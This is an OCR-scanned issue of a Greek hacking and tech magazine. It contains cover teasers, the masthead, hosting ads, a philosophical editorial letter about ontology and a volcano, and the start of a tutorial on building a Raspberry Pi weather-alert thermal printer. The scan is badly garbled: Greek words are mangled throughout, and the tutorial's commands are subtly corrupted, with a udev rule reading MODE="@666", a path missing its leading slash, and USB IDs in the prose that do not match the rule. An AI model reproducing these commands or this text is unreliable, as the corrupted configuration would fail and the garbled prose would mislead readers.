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Γνωρίζουν σχεδόν τα πάντα, για σχεδόν οτιδήποτε 


H Έβγα της γειτονιάς και πῶς από το Bárðarbunga 
φτάνουμε στο μάταιο της Τεχνητής Νοημοσύνης 


Φτιάχνουμε ένα σύστηµα ἔγκαιρων 
προειδοποιήσεων για ακραία καιρικά 
φαινόμενα, βασισμένο στο Raspberry Pi 
και σ' ἕναν θερμικό εκτυπωτή 


Αποκάλυψη bugs και vulnerabilities 
µε την τεχνική του fuzzing 


Αναλυτικές οδηγίες για την εγκατάσταση 
του Kali Nethunter στο Android device σας 
-- και demo επιθέσεων 


Αναλυτική παρουσίαση µιας ευέλικτης λύσης 
για την ισχυρή κρυπτογράφηση δίσκων και 
διαμερισμάτων 


Το απαραίτητο λογισμικό σε Python 
και η ανάλυση του κώδικα 


Μαθαΐνουμε ν' αναπτύσσουµε εφαρμογές 
εύκολα και γρήγορα, για την πλατφόρμα .ΝΕΤ 
της Microsoft 


Εκδότης / Διευθυντής Χρήστος Βαρελὰς 

Αρχισυντάκτης Παναγιώτης Βαρελὰς 

Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Γιῶργος Αραβίδης, Παναγιώτης Βαρελάς, Χρήστος 


Βαρελάς, Ανδρέας Βενιέρης, Γιώργος Γιάννου, Μανώλης 
Κιαγιάς, Ιωάννης Κονιάρης, Πέτρος Κυλαδίτης, Γιώργος 
Μελέκος, Νίκος Μουρατίδης, Θωμάς Σερμπίνης, Νικόλαος 
Σηφάκης, Μέσος Παπαδόπουλος (TM), Χρίστος Τόμπρας 


Γραμματικἠ επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το ηλεκτρονικὀ περιοδικὀ deltaHacker εἶναι συνδρομητικό και εκδίδεται ano την Par- 
abing Creations δώδεκα φορὲς το Χρόνο, κάθε μήνα. H Parabing Creations ἐχει την 
έδρα της στην Καλαμαριά Θεσσαλονίκης. O δικτυακὀς τόπος του περιοδικού εἶναι στο 
http://deltahacker.gr. To email επικοινωνίας εἶναι το talk2us@deltahacker.gr και ειδικά 
για τις συνδρομὲς εἶναι το subscriptions@deltahacker.gr. Οι γενικὲς πληροφορἰες για τις 
συνδρομές παρατίθενται στο hittp://deltahacker.gr/subscriptions και οι ἰδιες οι παραγγελίες 
γίνονται ano το http://deltahacker.gr/pdfi2order. Όλες οι απὀψεις που εκφράζονται στα 
άρθρα δεν εκφράζουν απαραίτητα και τη γνώμη του περιοδικού. 


YOUR VERY OWN PLAYGROUND IN THE CLOUD. 
SECURE & GREEN. PAY AS YOU GO. 


Keep your data in Iceland and take advantage of GreenQloud's cloud 
services powered by abundant, stable and cost effective, clean energy 


* Up to 16 CPUs and 32gb RAM e Network separation at the 


A in the KVM hypervisor hardware level 
* 64-bit server image templates ° Dedicated IP address and 
including Ubuntu, Debian, reserved bandwidth 
FreeBSD, CentOS and more 
* EC2 compatible 
ComputeQloud™ * Built-in firewall 
Host & Manage e Instant scalability 
e In-browser noVNC client and 
full root access via ssh * Online dashboard 
aay CY 
* Triple-redundant storage . 53 compatible 
e Full encryption e Bucket websites 
StorageQloud™ e Sync across all platforms e Automatic load-balancing 
Backup & Share 


For more information visit our webiste: www.greenqloud.com 
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Αγαπητοί μου, 
Μόλις επέστρεφα από την Έβγα του πυρίου Κώστα. 


Με είχαν στείλεν να πάρω ζάχαρη άχνη για! jove κουραμπυέδες που προ- 
σπαθούν να φτιάξουν απὀ το πρωΐ, η μητέρα, της εξαδέλφης και η Κυρία 
Καίτη. ; 7» 

Κακά τα ὑέματα, είµαστε πάλιν στο Δεκέμβριο καν οδεύουµε ολοταχώς 
προς τα Χριστούγεννα. EF ου καν η πρεμούρα να φτάξουμε κουραμπιέδες. 

Λα λα. Πώς πάεν το τραγουδάκι; Χριστούγεννα µας έφτασαν, εμπρός 
βήμα ταχύ, να τα προὐπαντήσουμε παιδιά στην εξοχή. H κάτι τέτοιο, τέλος 
πάντων. 

Βέβαια καμιά όρεξη δεν έχω να τρέχω χειυμωνιάτικα στην εξοχή, αλλά µην 
το κάνουμε θέµα τώρα, αφού µας το προτρέπει ο ποιητής, κάτι θα ξέρει. 

Λονπόν. Ον πολιτικές εξελίξενς τρέχουν. Είμαν γενικά πολύ μπερδεμµένος 
αλλά η επίσκεφη στην Έβγα του πυρίου Κώστα pe έκανε να δω τα πράγµατα 
καθαρά. H μάλλον µε έκανε να δω πως υπάρχουν κάποιον που βλέπουν τα 
πράγματα καθαρά. (Βγώ πάλιν, ὀχν.) 

H συζήτηση στην Έβγα είχε ξεκινήσεν απὀ πολλή ώρα. Όλον ον θαμώνες 
είχαν κάτν να πούνε, παν όλα τα θέµατα ήταν πλέον τραπέζι: Ον τριακόσνον 
του έθνους’ ον φηφοφορίες yla τον Πρόεδρο της Δημοκρατίας” ον αιτιάσεις 
για χρηματισμό” OL κρυφές μαγνητοσκοπήσεις” ον επερχόµενες (από ὁ,τν 
φαίνεται) εκλογές’ OL απαιτήσεις της τρόικας’ η διαγραφή του Ελληνικού 
χρέους” ον Γερμανικές αποζημιώσεις’ η άνοδος της τιμῆς του πετρελαίου” 
τα γεωπολιτυκά σχέδια του Πούτιν’ ον χακερυκές επιδόσεις της Βορείου Κο- 
ρέας’ η Νπόκο Χαράμ. 

TO βασικό µας πρόβλημα όµως είναι ένα, σε αυτό συμφωνούσαν όλον. H 
λύση είναν απλή. Μπροστά στα μάτια μας. 


Πλήρωσα τη ζάχαρη και TEPLLEVG να ακούσω. La κάπονο λόγο, όμως, ον 
πολιτικοί αναλυτές της Έβγας του Κυρίου Κώστα δίσταζαν να μιλήσουν. Τους 
µπέρδενε η παρουσία µου; Δεν ξέρω. Μην έχοντας άλλη επιλογή τους άφησα 
και επέστρεφα σπίτι εξ σου αδαής µε όσο και όταν είχα βγεν. 

Ῥέμαν λονπόν καθισμένος στην γραφομηχανή της Κυρίας Καίτης καν σκέ- 
φτομαν. Δίπλα μου η εξαδέλφη διαβάζει ειδήσεις στο τάμπλετ. 

H βασική µας εκκρεμότητα, µη νομίζετε πως έχω ξεχάσει, έχεν να κάνεν 
HE το ηφαίστειο και τους Ισλανδούς. Μπουμπουνίζεν το Bárðarbunga ἡ δεν 
μπουμπουνίζει καν περνµένεν τους Ισλανδούς yra να μπουμπουνίσειν; Kaier η 
λάβα του ἡ δεν καίειν: Υπάρχεν η επιστολή µου ἡ δεν υπάρχει; Κάνουν τζιν TGL 
τα τζιτζίκνα ἡ δεν κάνουν; 

Προβληματίζοµαν λίγο, αγαπητοί µου, διότι αν το είχα φανταστεί OTL θα 
χρεναζόμουν τόσες καν τόσες επιστολές για να εξηγήσω το αυτονόητο, θα 
το είχα αποφύγει το θέμα. 

(Βντάξεν, τρόπος του λέγειν "αυτονόητο". Υπερβολές.) 

Λοιπόν. Για να δούμε πού βρισκόμαστε. Βουτάω κατευθείαν στα βαθιά νερά. 
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Βρισκόμαστε εκεί που ισχυριζόµουν πως ον οντολογικές αποφάνσεις Elvar 
αδύνατες και πως ον οντότητες για τις οποίες μιλάμε δεν υπάρχουν "αντι- 
κειμενικά" παρά µόνο ως έννονες (ἡ ονόματα) "στο πλαίσιο ενός μοντέλου 
ερμηνείας του κόσμον". Ἰόνιζα πως είναν το μοντέλο αυτό που "δίνει νόημα" 
στις έννονες καν "περυγράφεν τις αλληλεξαρτήσεις τους µε τις άλλες έννονες 
του ἴδιον μοντέλου". Ον έννοιες ον ίδνες δεν υπάρχουν. 

Αυτό έγραφα. Απλό δεν είναι» Απλό. 


Κι όµως, κάτι µου λέεν πως δεν σας έχω πείσει καθόλον. Τις προάλλες 
ο ανιφιός µου έστειλε µε PELA ένα απόσπασμα από κάποιον διάλογο στο 
Facebook που συμμετείχε καν ο Κύριος Εκδότης. Παραθέτω χαρακτηριστικό 
απόσπασμα. 

"Εμένα πάλι δεν μου το βγάζετε από το νου (μιλάει ο Κύριος Εκδότης) 
ότι το Bárðarbunga εκρήγνυται ανεξαρτήτως μοντέλων, Ισλανδών ἡ epn- 
νενών. θεωρώ OTL δύσκολα θα βρεθεί παρατηρητής, οπουδήποτε στο γνωστό 
ή άγνωστο Σύμπαν, ο οποίος δεν θα ννώσει µια κάπονα ενόχληση βουτώντας 
µέσα στη λάβα." 

Μπερδεύομαν, Είπα εγώ ποτέ κάτι τέτοιο» Νομίζει πράγµατν ο Κύριος 
Εκδότης πως κατά τη γνώμη pov αν δεν ξέραμε τν είναν τα ηφαίστεια ba 
μπορούσαμε κάλλιστα ν' αρχίσουμε τα μακροβούτια στη λάβα; Βουτάω στα 
βαθιά νερά είπα, όχν στην λάβα. 


"AUTO το 'κάτν' (συνεχίζει ο Κύριος Εκδότης) είναν εκεί καν κάνει ὁ,τι 
ξέρεν να κάνει, αδιαφορώντας επιδεικτικά YLA τους παρατηρητές." 


Λοιπόν, για να πούμε τα πράγματα µε το ὀνομά τους: Με τη διατύπωση 
αυτή δεν διαφωνώ. Καθόλου. 

Αυτό το "κάτν" είναν πράγματι εκεί και κάνει O,TL ξέρει να κάνεν. 

Όμως άλλο λέω. Λέω πως εμείς OL άνθρωπον δεν έχουµε ιδέα οὐτε TL εἰ- 
ναν αυτό το κάτι, ούτε TL κάνει, ούτε τν ξέρεν να κάνεν. Δεν μπορούμε ποτέ 
να μιλήσουμε "αντιυκευμενικά" γνα το "τι είναι" και "τι δεν εἰναι". Βνκασίες 
κάνουμε καν περιγραφές. Φτιάχνουμε ερμηνευτικά μοντέλα. Ον οντότητες 
γνα τις οποίες μιλάμε δεν υπάρχουν "αντυκευμενυκά". Αυτό σημαίνει εκείνη η 
φρασούλα που έγραφα --καν µε χαρά ξαναγράφω: "Ον οντολογικές αποφάν- 
σεις είναν αδύνατες." Τελεία. Παύλα. 

Αυτό δεν σημαίνεν πως κατ' εμέ ο κόσμος "δεν υπάρχεν". Αυτό έλειπε. Mra 
χαρά υπάρχει. Ανεξάρτητα KAL πέρα από 'μένα, KL από εσάς παν απὀ όλους 
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τους άλλους. Όμως, εμείς ον άνθρωπον δεν έχουµε άµεση πρόσβαση στο "πώς 
είναν" ο κόσμος. Νομίζουμε πως έχουµε αλλά δεν έχουµε. TO µόνο στο οποίο 
έχουμε πρόσβαση είναν στο πώς τον παταλαβαίνουµε. Αυτή, η ερμηνευτική 
πρόσβαση στον κόσμο Υίνεταν πάντα µε τη διαμεσολάβηση ενός προκατα- 
σκευασμένου εννοινολογικού μοντέλου. "Προκατασκευασμένο", εδώ, σηµαίνεν 
πως δεν το έχω φτιάξεν ούτε εγώ, οὔτε εσείς, ούτε η μητέρα της εξαδέλφης 
που είναν ἹΙνδουίστρια. Ούτε καν ο Κύρνος Εκδότης, ο πρωτοπόρος αυτός 
επιστήµων καν λοιπά καν λουπά. Όλον εμείς το έχουµε βρει έτοιμο. Είναι 
προΐόν µιας εποχής, αλλά ὄντες όλον εμείς στην ἰδια εποχή δυσκολευόμαστε 
να δούμε την ιστορικότητά του. 


TO βασικό ζητούμενο απὀ ένα εννονολογικό μοντέλο --οποιοδήποτε εν- 
νονολογικό µοντέλο-- δεν εἶναν οὔτε η αντικενµενικότητα, οὔτε η ορθότη- 
τα, OVTE η αλήθεια (whatever that is). Βίναν η ερμηνευτική του επάρκεια. 
Αρχεί να µας επιτρέπεν να κατανοούμε το ένα ἡ το άλλο φαινόμενο µε ικα- 
νοποιητικό (για µας) τρόπο. 


Ευδικῇ περίπτωση EVVOLOAOYLXWY μοντέλων είναν αυτά που ονομάζουμε 
"επιστημονικά". Το επιπλέον ζητούμενο από αυτά, πλέον της ερμηνευτινκής 
τους επάρκειας, είναν η εσωτερική συνέπεια. Δεν έχει σημασία τι πιστεύω. 
Μπορεί εγώ, καν όλον ον άνθρωπον της εποχής μον, να πιστεύουμε πως η Γη 
είναν στο κέντρο του κόσμου καν πως ο θεός Έλνος διασχίζεν τον ουρανό µε 
το πύρινο άρµα του. Εφόσον πιστεύουμε πως ο θεός Έλνος δεσμεύεται από 
τον ρόλο του KL OTL αύριο θα ἔρθει µε το άρμα του την προβλεπόμενη ώρα 
ακόμα HL αν EXEL πονοκέφαλο ἡ τον πείραζε το πρωινό, τότε το ερμηνευτικό 
µας μοντέλο είναι επιστηµονικόὀ. 


θα µε ρωτήσετε, πιθανόν: Δηλαδή υπάρχεν ο θεός ο Ἠλνος; θα σας γελά- 
σω. Για όσους πάντως TOV περιµένανε κάθε πρωί να έρθεν για να τους φέρεν 
την αυγή, αυτός ερχόταν. Άρα γν' αυτούς υπήρχε. 

To Bárðarbunga υπάρχει; Υποθέτω. Κατά το PETPO που υπάρχουν 
Ἰσλανδοί υπάρχεν. Προτού πάνε εκεί ον Ισλανδοί, βεβαίως, δεν υπήρχε. Δεν 
υπήρχαν OVTE η Ισλανδία ούτε ον Ισλανδοί. Υπήρχε η Govan, και κάπονον 
έβλεπαν τους καπνούς καν πίστεναν πως κάπου εκεί κρυμμένα βρίσκονταν τα 
εργαστήρια του Ἠφανστον. 

Καταλαβαίνετε πού το πάω; Μπορεί να µην υπήρχε το Bárðarbunga, 
αλλά YLA όσους πήγαιναν κατά HEL, αρκούσε να προσέχουν πού πατάνε, καν 
να αποφεύγουν τα μακροβούτνα στη λάβα. Λόγω Ἡφαίστον, ὀχι τίποτα άλλο. 

Πού µας οδηγούν όλα αυτά λοιπόν; 

Μας οδηγούν εκεί απ' όπου ξεκινήσαμε τον περασμένο Αύγουστο, όταν 
αναρωτιόµουν γνατί αποτυγχάνουµε σε όλες µας τις προσπάθειες να φτιά- 
ζουμε αλγοριθµικά μοντέλα της ανθρώπινης σκέψης (επιστολή 025). 

Έγραφα: "Αποτυγχάνουμε γνατί παίρνουμε ως δεδομένο πως η «αντικει- 
μεννκότητα», whatever that is, είναν θεμέλνο της ανθρώπινης σκέῴης, ενώ 
δεν είναν παρά προϊόν της προσπάθειάς µας να περυγράφουμε το πώς εμπλε- 
πόμαστε, εμείς OL άνθρωπον, στον κόσμο. Ένα προΐόν ιστορικό." 

Εμμένω σε αὐτό. 

Σας αφήνω τώρα γιατί η εξαδέλφη πάει στην κουζίνα να βοηθήσει µε τους 
κουραμπιέδες. Βυκανρία να διαβάσω στο BBC για την Βόρειο Κορέα καν το 
χάκεµα στη Σόνυ. Μα πού πηγαίνεν ο κόσμος µας, µου λέτε; 


Σας ασπάζοµαν, 
θείος Απάνιος 


DigitalOcean 


Ταχύτατα VPSes oto cloud, σε hosts µε δίσκους SSD. 
Επιθογή datacenter σε Ευρώπη, Αμεριμή μαι Ασία. 
Lean-mean control panel, για απὀῆυτο έβεγχο. 


Αποητήστε τώρα το δικό oasVPS, 

στο cloud της DigitalOcean. 

Κάντε KAIK στο http://bit.ly/digocean1 Ooff 
Kal κερδίστε αυτομάτως 109 σε credit. 


Hint: Επιλέγοντας το μικρό πῆάνο, 

πάντα µε μῆιη στο http://bit.ly/digocean1 Doff, 
ουσιαστιμά έχετε δύο µήνες δωρεάν για ένα VPS 
µε 512MB RAM, 20GB SSD μαι 1TB transfer. 


ΕΙ Δεν είναι Ki ἄσχημα 


Skill: Beginner 
Tags: Raspberry Pi, thermal printer, GPIO, MAX3232, Python 


οσο σσ 


Ἔκτακτα δελτία καιρού ano το Raspberry Pi [μέρος 1ο] 


Έχετε παΐξει παιχνίδια µε post-apocalyptic σενάριο; Μιλάμε για τα παιχνίδια 
που τοποθετούν τον ήρωα στη Γη, αλλά µετά ano το ξέσπασμα µιας τεράστιας 
καταστροφἠς. Eva συνηθισμένο στοιχεἰο σε αυτά τα σενάρια αποτελεῖ το πάντρεµα 
παλιών και νέων τεχνολογιών, αφού οι ἄνθρωποι δεν ἔχουν τους πόρους ἡ τα 
μέσα για την ανάπτυξη σύγχρονων λύσεων. Ε, λοιπὀν, κάτι τέτοιο αποφασίσαμε 
να κἄνουμε κι Epic! Όχι γιατί δεν EXOUPE τους πόρους ἡ περιμένουμε κάποια 
καταστροφἠ να oupPei, αλλά για την πρόκληση και το χαβαλὲ :D 


Έκτακτα δελτία καιρού από to Raspberry Pi [µέρος 10] 
ιά 


Στο τεύχος 017 του περιοδικού, ο καλὸς φίλος και συνάδελφος GiannouG napou- 
σἰασε To Internet of Things. Σ' exeivo To άρθρο, χρησιμοποιώντας Eva Arduino και 
το Ethernet shield μὰς ἐδειξε πὠς μπορούμε να συνδέσουµε ἑναν αισθητήρα θερ- 
μοκρασίας σ' αυτό το ιδιότυπο δίκτυο συσκευών. Στο παρὀν τεύχος θα κἄνουμε TO 
αντίστροφο: Θα χρησιμοποιήσουμε το αγαπημένο µας Raspberry Pi κι αντἰ να στεἰ- 
AOUHE μετρήσεις σε κἀποιο δίκτυο, θα αντλήσουμε τα αποτελέσµατα απὀ μετρήσεις 
που ἑκαναν άλλοι. Στη συνέχεια θα επεξεργαστούµε τα σχετικἁ δεδομένα και θα τα 
παρουσιάσουμε σ' Eva φυσικὀ και OIKEIO μέσο: στο χαρτὶ! Πα να γίνουμε πιο συγκε- 
κριμένοι, θα κατασκευάσουµε Eva σύστημα ειδοποίησης για ακραία (και µη) καιρικά 
Φαινόμενα, που θα στηρἰζεται στο Raspberry Pi και σε Evav θερμικὀ εκτυπωτή. ‘Eva 
τἐτοιο σύστημα θα μπορούσε να τυπώνει μηνύματα σε συγκεκριµένα χρονικά δια- 
στήματα και να παρουσιάζει την πρὀγνωση για τις επὀµενες ὠρες. Εναλλακτικά, θα 
μπορούσε να επιδεικνύει MEIOW, τυπὠνοντας μηνύματα μόνο ὁταν επἰκειται κάποια 
επικίνδυνη ἡ απότομη µεταβολἠ στον καιρό. Εμεὶς προτιµήσαμε τη δεύτερη προσέγ- 
γιση, επειδἠ θα εξοικονομείἰ χαρτὶ και οι εκτυπώσεις θα ἐχουν μεγαλύτερη βαρύτητα: 
Κάθε μήνυμα που θα τυπώνεται απ' αυτό το σύστημα θα τραβάει την προσοχἠ µας 
για τα καλὰ. 


Ζήτημα επικοινωνίας 


‘Eva βασικὀ πρὀβλημα που πρέπει να àù- 
σουµε αφορά στη διασύνδεση του EKTU- 
πωτὴ µε το Raspberry Pi. Οι θερμικοὶ 
εκτυπωτὲς διαθέτουν συνήθως µια θύρα 
USB ἡ μία σειριακἠ. Πέρα ὁμως ano τον 
"φυσικό" τρόπο σύνδεσης, που αφο- 
på σε καλώδια και σε βύσματα, πρέπει 
να ασχοληθούμε και µε τη "λογική" δι- 
ασύνδεση των συσκευών, δηλαδή µε TO 
πρωτόκολλο επικοινωνίας. Όπως φαντά- 
ζεστε, γενικὲς λύσεις που να δουλεύουν 
για κάθε εκτυπωτή δεν υπάρχουν. Εμεὶς 
εἶχαμε στη διἀθεσἠ µας το θερμικὀ EKTU- 
noT Epson TM-T20, ο οποίος έχει Ka- 
τανάλωση μόλις 1Watt και απ' αυτή την 
άποψη θα λέγαμε ότι αποτελεἰ το ἑτερον O εκτυπωτής που εἰχαμε στη διάθεσή µας διέθετε 
ἡμισυ Tou Raspberry Pi. O συγκεκριμέ- _ θύρα USB, ενώ υποστηριζόταν κι απὀ τη βιβλι- 
νος εκτυπωτής διαθέτει θύρα USB, yeyo- οὐκ escos, tro, η aona του and ve πρό 
νὸς που διευκόλυνε αρκετά την εργασία 

μας. Αυτὸ που χρειαζόµασταν ἦταν Kå- 

ποιο πρὀγραμμα που θα επέτρεπε τον ἐλεγχο του εκτυπωτή απὀ τον µικροσκοπικὀ 
υπολογιστή µας. Κάπως ἐτσι ξεκινήσαμε µια αναζήτηση στο Διαδίκτυο και πολὺ σύ- 
ντοµα καταλήξαμε στη βιβλιοθήκη python-escpos. Το σχετικὀ repository φιλοξενεὶ- 
ται στο Google Code και στη διεύθυνση https://code.google.com/p/python-escpos. 
Πα να κατεβάσουµε τον κὠδικα της βιβλιοθήκης απαιτείται το VCS (Version Control 
System) ονόματι Mercurial!: 


sudo apt-get install mercurial 


1. Av δεν γνωρίζετε τι εἶναι To Mercurial µπορείτε να διαβάσετε τα άρθρα Tou Sonic για τα Version Control Systems, στα τεύχη 003 και 004 του 
περιοδικού. 
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Doo ND" 


Πα την πραγματοποίηση της λήψης δώσαμε KATI τέτοιο: 
hg clone https://code.google.com/p/python-escpos/ ~/escpos_source 


Με αυτὸν τον τρὀπο δημιουργήθηκε, στο home directory, ο κατάλογος escpos_ 
source, εντὸς του οποίου βρισκόταν ο πηγαϊος κὠδικας της βιβλιοθήκης escpos. 
Πα την εγκατάσταση, ὅμως, απαιτούνταν τα λεγόμενα setup tools, καθώς και η πα- 
ρουσία μερικὠν ακόµα βιβλιοθηκών. Έτσι, το επὀμενο βήμα ἧταν να δώσουμε κάτι 
ΤΕΤΟΙΟ: 


$ sudo apt-get install python-imaging python-serial python-setuptools 
Όταν ολοκληρώθηκε η εγκατάσταση των παραπάνω, προχωρήσαμε στην προσθἠ- 
κη της βιβλιοθήκης py-USB. Πα το σκοπὀ αυτὸ μεταβήκαμε στη διεύθυνση http:// 
sourceforge.net/projects/pyusb, κατεβάσαμε το πακέτο µε TOV πηγαίο κὠδικα και το 
αποσυμπιἑσαµε. Στη συνέχεια εισήλθαμε στον κατάλογο µε TOV κὠδικα και δώσαμε 
τα εξἠς: 

$ python setup.py build 

$ sudo python setup.py install 


Μετά κι απ' αυτό μπορούσαμε πλέον va EYKATAGOTNOOULE και τη βιβλιοθήκη escpos. 
Ἔτσι, µεταβήκαμε στον κατάλογο µε τον πηγαίο κὠδικα και χρησιμοποιήσαμε το 
setup.py µε τον ἰδιο τρόπο: 


$ cd ~/escpos_source 
$ python setup.py build 
$ sudo python setup.py install 


Σύνδεση μέσω σειριακἠς 


Οι σειριακὲς θύρες εἶναι apys, δεν προσφέρουν τη λειτουργία plug and play, δεν 
επιτρέπουν τη σύνδεση πολλών συσκευών ταυτόχρονα και γενικότερα υστερούν 
σε κάθε τομέα σε σχέση µε τις θύρες USB. Μολαταύτα τις συναντάμε ακόμα 
και σήμερα σε πολλὲς συσκευές. AUTO το φαινόμενο παρατηρείται περισσότερο 
σε συσκευὲς "επαγγελματικού" χαρακτήρα, που οφείλουν να παρουσιάζουν τη 
μέγιστη δυνατή συμβατότητα ακόµα και µε τα παλιά μηχανήματα. Όπως καταλα- 
βαΐνετε, σε αυτέςτις συσκευὲς συγκαταλέγονται και πολλοί θερμικοἰ εκτυπωτές. 
Αν πέσει στα χέρια σας κάποια τέτοια συσκευή δεν πρέπει να απογοητευτεἰτε. 
Μπορεί η πλακέτα του Raspberry Pi να µη διαθέτει την κλασική υποδοχἠ των 
σειριακὠν θυρών, αλλά ενσωματώνει το σχετικὀ κύκλωμα. Έτσι, ανάμεσα στους 
ακροδέκτες GPIO υπάρχουν και κἄποιοι που μεταφέρουν τα σήματα µιας σειρια- 
κἠς σύνδεσης (TX και RX). AUTO σημαίνει ὁτι η σειριακἠ σύνδεση ενὸς θερμικού 
εκτυπωτἠ µε TO Raspberry Pi εἶναι εφικτἠ και σχετικἀ εὐκολη. Μη νομίζετε ὁμως 
ότι αρκούν μερικὰ καλωδιάκια. Τα Ψηφιακά κυκλώματα του Raspberry Pi λει- 
τουργούν στα 3.3ν, ενώ οι τυπικὲς σειριακὲς συνδέσεις (85232) χρησιμοποιούν 
συνήθως τα -12V για το λογικὀ μηδὲν και τα 12V για το λογικό Eva. Πα να µην 
καταστρέψουμε την αγαπημένη µας πλακέτα, χρειαζόμαστε Eva κύκλωμα που θα 
πετυχαίνει τις απαιτούμενες μετατροπὲς στις τάσεις. Τα κυκλώματα του εἰδους 
ονομάζονται LLC (Logic Level Converter) και µια δηµοφιλἠ υλοποίηση αποτελεϊὶ 
το τσιπάκι ΜΑΧ3232. Με µια αναζήτηση στο eBay θα βρείτε πλακέτες που στηρὶ- 
ζονται στο εν λόγω TOINAKI και κοστἰζουν λιγότερο ano 2 ευρώ. 
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Έκτακτα δελτία καιρού από to Raspberry Pi [µέρος 1ο] 
ιά 


Περισσότερη ασφάλεια! 


Έχοντας εγκαταστήσει ὀὁλες τις anai- 
τούμενες βιβλιοθήκες για το χειρισμὸ 
του εκτυπωτή, ο πειρασμὸς ν' αρχἰσου- 
µε τη συγγραφή κὠδικα ἦταν μεγάλος. 
Ωστόσο ξεκινήσαμε µε µια προπαρα- 
σκευαστικἠ εργασία που θεωρήσαμε 
αναγκαία. Στις μικρὲς και λιτὲς διανομές 
Linux -oav αυτὲς που προορίζονται για 
To Raspberry Pi- δεν υπάρχουν οι αυ- 
τοματισμοί που συναντάμε στις διανομές 
για συστήματα desktop/server. Έτσι, 
όταν συνδέουµε µια συσκευἠ USB, οι 
anAoi χρήστες δεν αποκτούν αυτομάτως 
πρόσβαση σ' αυτή. Αναρωτιέστε τι σχὲ- 
ση xouv όλα αυτά µε την εργασία µας; 
Πα να μπορεί το προγραμμάτακι µας να 
τυπώνει τα δελτία καιρού, θα έπρεπε va 
τρέχει µε δικαιώματα root. To iðio πρὀ- 
γραμμα, όμως, θα χειρίζεται δεδομένα 
που αντλεί ano το δίκτυο. Όπως kaTa- 
λαβαίνετε, αυτό το "σχήμα" εἶναι αρκετά 
επἰφοβο και δεν µας ἄρεσε καθόλου. H 
λύση που σκεφτήκαμε ἦταν να επιτρὲ- 
WOUHE την πρὀσβαση στον εκτυπωτή σε 
ὁλους τους χρήστες. Ἐτσι, το πρὀγραμµα 
για την εκτύπωση των δελτίων θα µπο- 
ρούσε να τρέχει µε τα δικαιώματα ενὸς 
απλού χρήστη κι OX! μ' εκείνα του root. 


Πα να πετύχουμε TO VEO στόχο NOU cgi- 
χαμε θέσει, αρκούσε η προσθήκη ενὸς 
κανόνα στο σύστημα udev. Εφόσον ο 
εκτυπωτἠς ἦταν συνδεδεμένος µέσω 
USB, η κατασκευὴ του κανόνα προῦπέ- 
θετε να μάθουμε Ta Product και Vendor 
ID. Auta τα δύο μεγέθη παρέἐχονται εὐ- 
κολα για οποιαδήποτε συσκευή USB, µε 
τη βοήθεια του lsusb. Με µια απλἠ EKTE- 
λεση Tou εν λόγω εργαλείου εμφανίζο- 
νται γραμμὲς σαν την ακόλουθη: 


Bus XXX Device YYY: ID product_ 
id:vendor_id Device_name 


Ta ΧΧΧ και ΥΥΥ αποτελούν τριψήφιους 
αριθμούς στο δεκαδικὀ σύστημα, ενώ 
τα product_id και vendor_id αποτελούν 
τετραψήφιους αριθμούς στο δεκαεξαδι- 
KO. Το Device_name πιστεύουμε OT! δεν 
χρειάζεται επεξήγηση. Στην περίπτωση 


3.3V 


O O 


οοοοοο 
5 
J 


O O 


To Raspberry Pi διαθέτει κύκλωμα σειριακἠς ENI- 
κοινωνίας, αλλά η πλακέτα δεν ενσωματώνει τη 
σχετική υποδοχή. Πα την πραγματοποίηση µιας 
τέτοιας σύνδεσης πρέπει να χρησιμοποιήσουμε 

μερικούς απὀ τους ακροδέκτες GPIO. 


οὐόδοώ 
ΟΟΟΟ 


Οι ακροδέἑκτες της σειριακἠς θύρας που 
πρέπει να συνδέσουµε µε τα αντίστοιχα 
GPIO του Raspberry Pi. 
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ÁN 


Αν εἶσαστε σκληροπυρηνικοί και αποφασίσετε να κατασκευἁσετε TO δικὀ 
σας LCC, θα χρειαστείτε κάποιο ολοκληρωμένο σαν TO MAX3232 και 
μερικούς πυκνωτές. 


του Epson ΤΜ-Τ20, To Product ID ἦταν το 0458 ενώ το Vendor ID εἶχε την τιµή 0603. 
Έχοντας αυτά τα δύο µεγέθη, προχωρἠσαμµε στη δηµιουργία του κανόνα. Οι κανόνες 
Tou udev ομαδοποιούνται και τοποθετούνται σε ξεχωριστά αρχεία, τα ονόματα των 
οποίων δηλώνουν και την προτεραιότητα των αντίστοιχων κανόνων. Όλα αυτά όμως 
αποτελούν λεπτομέρειες που ξεφεύγουν ano το θέμα µας. Πα την προσθήκη του 
νέου κανόνα δημιουργήσαμε το ακόλουθο αρχείο: 


$ sudo nano etc/udev/rules.d/99-escpos.rules 
Μέσα στο αρχείο βάλαμε την ακόλουθη γραμμή: 


SUBSYSTEM=="usb", ATTRS{idVendor }=="04b8", ATTRS{idProduct}=="0e03", 
MODE="@666" 


Αφού αποθηκεύσαμε το αρχείο, απέµενε µια επανεκκίνηση της υπηρεσίας udev: 
$ sudo service udev restart 
Αυτό ἦταν ὁλο. Με Ta παραπάνω βήματα εἰχαμε εξασφαλἰσει ότι οι απλοί χρήστες θα 
εἶχαν πλήρη πρόσβαση στον εκτυπωτή, avå πάσα στιγμή. 
Λεπτομέρειες υλοποίησης 


Σε αυτὸ το στάδιο θα μπορούσαμε, επιτέλους, να ξεκινήσουμε µε τη συγγραφή του 
κὠδικα. Ano πού θα naipvape τα δεδομένα, ὀμως; Με ποιον τρόπο θα γινόταν η επε- 
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Έκτακτα δελτία καιρού από to Raspberry Pi [µέρος 10] 
0“ 


ξεργασία τους και πὠς θα προβάλλονταν; 
H αλήθεια εἶναι ὁτι πριν γράψουμε ἐστω 
και µια γραμμή κὠδικα, ἐπρεπε να εξετά- 
coupe το ὁλο πρὀβλημα διεξοδικά και να 
λύσουμε τα ὀποια προβλήματα. 


Στο Διαδίκτυο υπάρχουν πολλές ETEW- 
ρολογικὲς υπηρεσίες και οι περισσότερες 
εμφανίζουν τις προγνώσεις τους μέσα 
ano σελίδες HTML, ενώ υπάρχουν και 
κάποιες που στηρἰζονται στην τεχνολο- 
yia Flash. Πάντως, ανεξάρτητα ano To τι μμ : y 

f f H αγορά ενὸς ἐτοιμου LCC µπορεί να απογοητεύει τον 
βλέπουμε στον browser, OPIGHEVEG unn- Κύρο Γρανάζη που κρύβεται μέσα σας, αλλά εἶναι η 
ρεσἰες προσφέρουν τα δεδομένα τους και ευκολότερη Και η ασφαλέστερη λύση. Εξάλλου, το 
